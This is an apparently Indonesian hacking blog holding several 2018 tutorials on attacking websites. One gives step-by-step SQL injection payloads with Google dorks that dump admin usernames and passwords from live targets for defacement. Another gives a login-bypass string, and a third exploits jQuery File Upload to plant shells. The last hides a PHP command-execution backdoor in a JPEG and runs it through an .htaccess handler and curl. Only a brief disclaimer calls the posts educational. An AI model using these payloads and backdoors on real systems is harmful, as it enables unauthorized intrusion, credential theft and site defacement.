Sabtu, 30 Juni 2018

Cara Ganti Password BeEF

Hallo friend,
Mungkin kalian semua udah pada tau software Exploitation Browser kek BeEF ini.

Kali ini w mau sharing, tapi bukan share cara pakenya, cuma cara ganti passwordnya aja wkwkwk

Konfigurasi BeEF ini ada pada config.yaml yg letaknya ada pada directory /etc/beef-xss/ 
 .

Kalian tinggal edit pake text editor kesukaan kalian bebas, w pake nano dan cari kata "passwd" dan ganti username dan passwordnya sesuka hati kalian


Yap kalo udah tinggal save dan saat udah masuk panel BeEF masukan user dan password baru deh wkwkwk.
Nah sampai sini udah kalo mau ganti password doang, untuk default user dan password pada aplikasi ini adalah "beef". 

Ok deh segini dulu aja lah, bingung mau post apa niih wkwkwk.. 
 

Selasa, 26 Juni 2018

Deface Dengan SQL Injection Manual

Hallo friend..
Kali ini w mau sharing kek judul di atas wkwkwkw.
seperti biasa teknik lama, tapi masih ok kok.

"Sql Injection adalah suatu teknik yg di gunakan oleh seorang attacker dengan memanfaatkan kesalahan sql yg menyebabkan kerentanan pada url seihingga dapat disisipi perintah sql untuk kepentingan attacker"

Yah itu pengertiannya yg w karang sedemikian rupa wkwkkww
Langsung aja lah kita praktek
Pertama seperti biasa kita dorking atau kalau sudah punya target yah langsung aja

Dork: 
  inurl:add_cart.php?num=
  inurl:addcart.php?
  inurl:addItem.php
  inurl:add-to-cart.php?ID=


Cari salah satu site, nah untuk ngecek site tersebut vuln atau enggak tambahin petik(') di belakang url

Example: http://site.co.li/admin.php?id=45'

Nah kalo muncul pesan error sql bla bla bla maka site tersebut vuln dan bisa di exploit kek di bawah.




Lanjut, setelah dapat target sekrang tambahkan syntak berikut di belakang url

 +order+by+1-- dibelakang url jadinya
jadinya:
 http://site.co.li/admin.php?id=45+order+by+1--

dan enter, terus ganti angka 1 jadi angka 2 dan seterusnya sampe ketemu error sql lagi. Kalo w error di angka 15, artinya ada 14 column dalam database tersebut.



Terus ganti perintanya dengan perintah 

 +union+select+1,2,3,4-- tergantung jumlah column yg ditemukan
tambahkan (-)strip didepan angka idnya atau tambahkan perintah +and+false+
Jadinya:
 http://site.co.li/news-full.php?id=-1049+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
atau
http://site.co.li/news-full.php?id=1049+and+false+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
 


Nah nanti akan muncul nomer togel, disini kalian bebas mau pilih angka berapa aja, pada dasarnya angka itu sama aja wkwkwk
W pilih angka 11, kita coba cek versi databasenya dengan perintah 

 @@version di ketik pada nomer togel pilihan kalian.
Jadinya:
 http://site.co.li/news-full.php?id=-1049+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14--


Nah keliatan dia pake mariaDB, lanjut kia liat nama-nama tabel yg ada pada database tersebut,

 group_concat(table_name) masukan di nomer togel kalian, kalo w no 11
 +from+information_schema.tables+where+table_schema=database()-- di akhir urlnya
Jadinya:
 http://site.co.li/news-full.php?id=-1049+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14+from+information_schema.tables+where+table_schema=database()--


Maka akan tampil nama-nama dari tabel dalam databasesnya, kalo kita mau deface maka yg kita cari adalah tabel yg berhubungan dengan user dan password misalnya tabel Users, admin, member atau apalah yg penting ada bau-bau usernya wkwkw.
Kalo live target gw tabel admin, tapi sebelum lanjut dump column, maka nama tabel harus di convert ke HexaDecimal. Buat convert kalian bisa pake online tools http://www.online-toolz.com/tools/text-hex-convertor.php (nanti tambahkan 0x didepan hasil outputnya) atau pake hackbar (sql > MySQL > MySQL CHAR).

Kemudian ganti group_concat(table_name) jadi group_concat(column_name) dan +from+information_schema.tables+where+table_name=database()-- jadi +from+information_schema.columns+where+table_name=0x61646d696e+--+

Nanti jadinya
 http://site.co.li/admin.php?=-45+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14+from+information_schema.columns+where+table_name=0x61646d696e+--+


Dan tampil isi dari tabel admin, ada column id, user,username dan password. Selanjutnya kita dump isi dari column id, username dan password saja.
Perintahnya ganti group_concat(id,0x3a,username,0x3,password) jadi group_concat(id,0x3a,username,0x3,password) 0x3a adalah tanda yg di convert ke Decimal dan yg bergaris miring adalah isi column yg mau w liat isinya wkwk. Ganti perintah +from+information_schema.columns+where+table_name=0x61646d696e+--+ jadi +from+admin+--+ yang bergaris miring adalah nama tabel yg sudah kita bokngkar tadi.



Dan nongol dah isi column id, username dan pasword. Biasanya passwordnya di hash tapi kebetulan live target w gk di password. Nah kalo udah gini tinggal cari admin login page dan masuk dah, kalo dah masuk ya terserah mau di apain wkwkw


NB: Semua artikel yg tercantum di http://www.tylexit.tk adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami   

Senin, 25 Juni 2018

Deface Bypass Admin Login No Redirect

Hallo friend..
Kali ini w mau share poc lama, udah bulukan, otak lu yg buluk wkwkwk.

Bypass admin login no redirect.
Ah lama kebanya bacot wkwkwk

langsung kalian dorking di gugel

Dork: inurl:/admin/login.php

Cari web yg target yg vuln kek gambar di bawah, masukan exploit seperti umumnya poc bypass admin

user: '=''or'
pass: '=''or' 


Ok, kalo vuln maka nanti akan masuk index admin panelnya kek gini


Tapi, ada tapinya, kalo klik option edit/delete nmalah di redirect ke login page lagi.


Nah ini yg jadi masalah, kan gk bisa lanjut jadinya. 
Nah kita bisa pake plugin noredirect addons, kalian install dulu

https://addons.mozilla.org/id/firefox/addon/noredirect/ 

Kalian klik link diatas dan klik install


Nah, kalo dah ke install kalian klik tools > Noredirect.
Nanti akan muncul tab baru, klik Add dan masukan link loginpage victim pada colom RegExp Pattern, liat gambar

  
Nah kalo dah kek gitu, coba kita login ulang dan coba edit, kalo vuln maka bisa kalian edit, nah sekarang terserah dah mau diapain. 


ok thx 
kalo kurang jelas bisa comment di bawah

NB: Semua artikel yg tercantum di http://www.tylexit.tk adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
  

Senin, 11 Juni 2018

Deface Dengan Jquery File Upload Vulnerability

Hallo friend,
kali ini w mau sharing poc basi, yah mungkin buat mastah minggir dulu. Btw gak ada ilmu basi, yg ada otak lu yg basi.

Yah tapi emang poc ini udah lama sih, tpi gpp buat sekedar belajar.
Oke pertama kalian buat csrf, atau bisa juga pake yg onlen wkwkw,
kalo w copy paste scriptnya.

Next kita dorking di gugel

Dork : inurl:/server/php intext:files

Kembangin lagi mang, 
kalo dapet web kasih exploit di belakang url 

exploit: /server/php/
contoh: http://site.co.li/admin/server/php/

Nah kalo blank bisa vuln bisa enggak, kalo mau yg jelas vuln tampilannya kek gambar di bawah



Selanjutnya kita buka csrf, copy pate code berikut

Ganti pada bagian action='link target' dengan link site yg vuln. Buka csrfnya dan cari shell atau script yg mau di upload.


Nah kalo dah ke upload di server maka penampakannya kek gambar dibawah


Kalo lagi hoki, kalian bisa upload shell dan bisa di akses, kalo lg gk hoki kek w, yah cuma bisa nitip file doang, itu juga txt.
Cara aksesnya tinngal tambahin /files/namafile.php

Contoh: http://site.co.li/admin/server/php/files/mini.txt 


Okeh, sekian dari sang noob
tengkyu neeh.!!

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami

Sabtu, 09 Juni 2018

Menyisipkan Backdoor PHP ke Dalam Gambar

Hallo friend..
W bakal share tutor lama sih, yah mungkin buat para mastah udah basi kali, mastah minggir dulu, sorry ni stah wkwkwk.

Kita bakal belajar steganografi, yaitu suatu teknik menyisipkan pesan rahasia kedalam sebuah gambar. Kita akan melakukannya dengan bantuan tool jhead.
Ok Langsung

Pertama Install dulu eaaa wkwk

 #apt install jhead

Kemudian siapkan gambar yg mau disisipi backdoor, untuk memastikan backdoor bersih dari sisipan backdoor sebelumnya maka kita wajib bersihin dulu

 #jhead -pure gambarlu.jpg


Okeh itu tandanya udah clear gak ada script yg disisipin
Next, giliran kita yg isigambarnya dengan backdoor wkwk
ketikan perintah berikut


Nah, kalian akan masuk ke vi editor, ketik tombol insert masukan code dibawah, ketik tombol esc, ketik :wq enter.

    <?php passthru($_POST['cmd']); __halt_compiler();


Code diatas merupakan fungsi php passthru yg berfungsi untuk mengeksekusi program lain, disini w pake buat eksekusi terminal atau cmd.
Selanjutnyatinggal kita cek apakah script sudah masuk ke gmbar atau belum

 #jhead gambarlu.jpg



Ok, kalo dah masuk tinggal upload dah ke server target, btw w pake localhost. SO! gak ngelanggar hukum wkwkwk.
Jangan lupa upload juga .htaccess yg isinya code berikut.  

 AddType application/x-httpd-php .jpg


file ini berfungsi agar server mengerti bahwa code yg ada di gambar adalah code php maka akan di eksekusi sebagai kode php.
Selanjutnya tinggal eksekusi deh,ketikan perintah berikut

 #curl -d cmd="uname -r; uname -a; id; ls;" http://localhost/ gambarlu.jpg --output hasil.txt  


Tinggal buka dah file outputnya,

 #cat fileoutput.txt


Oke dah selanjutnya eksplore sendiri wkwkw
Thx

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami